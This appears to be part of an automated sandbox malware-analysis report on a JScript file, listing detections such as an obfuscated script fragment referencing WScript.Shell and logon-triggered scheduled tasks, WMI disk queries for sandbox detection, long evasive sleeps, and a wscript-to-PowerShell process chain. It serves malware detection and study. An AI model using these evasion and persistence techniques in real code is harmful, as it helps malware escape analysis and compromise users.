Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Potential evasive JS / VBS script found (domain check)
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: USERDOMAIN%\\%|iteWr|etFileG|RunEx|ript.ShellWSc|tingsset|leStartWhenAvailab|rectoryWorkingDi|floor|pSlee|LogonTriggerId|twscrip";FRWMh = HQgORQZ.split("|");XYNcro = FRWMh[RuamKJ];for (var akvCX = 0;
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4625 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5238 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5994 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3810 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep count: 4625 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep count: 5238 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268 Thread sleep count: 5994 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268 Thread sleep count: 3810 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS" Jump to behavior
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
